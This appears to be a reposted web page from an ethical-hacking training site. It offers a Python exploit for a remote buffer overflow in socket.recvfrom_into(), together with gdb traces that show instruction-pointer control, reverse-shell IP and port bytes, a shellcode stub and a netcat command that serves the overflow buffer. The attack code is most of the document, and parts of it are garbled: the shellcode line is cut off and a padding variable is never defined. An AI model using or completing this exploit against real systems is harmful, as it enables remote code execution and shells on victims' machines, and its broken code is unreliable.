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Rank Great: Exploit for socket.recvfrom through remote buffer overflow Unknown rwxr-xr-x 0 2/25/2014

Filename Rank Great: Exploit for socket.recvfrom through remote buffer overflow
Permission rw-r--r--
Author Unknown
Date and Time 2/25/2014
Ethical Hacking Institute in Pune
./Arizona Team 

Hello everyone, here we are back with an interesting exploit related to buffer overflow. Exploit is written in Python and is working great. Just have a look through the given below code, understand the logical flow and then try to create it by your own. If you have any problem related to understanding the logical flow you can shoot an query to instructor@arizonainfotech.com.     


#!/usr/bin/env python

socket.recvfrom_into() remote buffer overflow

TODO: rop to evade stack nx

(gdb) x/i $eip
=> 0x817bb28:        mov    eax,DWORD PTR [ebx+0x4]  <--- ebx full control => eax full conrol
   0x817bb2b:   test   BYTE PTR [eax+0x55],0x40
   0x817bb2f:   jne    0x817bb38 -->
   0x817bb38:   mov    eax,DWORD PTR [eax+0xa4]      <--- eax full control again
   0x817bb3e:   test   eax,eax
   0x817bb40:   jne    0x817bb58 -->
   0x817bb58:   mov    DWORD PTR [esp],ebx
   0x817bb5b:   call   eax <--------------------- indirect fuction call

$ ./pyrecvfrominto.py
        egg file generated

$ cat egg | nc -l 8080 -vv

... when client connects ... or wen we send the evil buffer to the server ...

0x0838591c in ?? ()
1: x/5i $eip
=> 0x838591c:        int3    <--------- LANDED!!!!!
   0x838591d:   xor    eax,eax
   0x838591f:   xor    ebx,ebx
   0x8385921:   xor    ecx,ecx
   0x8385923:   xor    edx,edx


import struct

def off(o):
        return struct.pack('L',o)

reverseIP = '\xc0\xa8\x04\x34'   #'\xc0\xa8\x01\x0a'
reversePort = '\x7a\x69'

#shellcode from exploit-db.com, (remove the sigtrap)
shellcode = "\xcc\x31\xc0\x31\xdb\x31\xc9\x31\xd2"\

shellcode_sz = len(shellcode)

print 'shellcode sz %d' % shellcode_sz

ebx =  0x08385908
sc_off = 0x08385908+20


        +------------+----------------------+         +--------------------+
        |            |                      |         |                    |
        V            |                      |         V                    |
buff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off)  # .. and landed ;)

print 'buff sz: %s' % len(buff)

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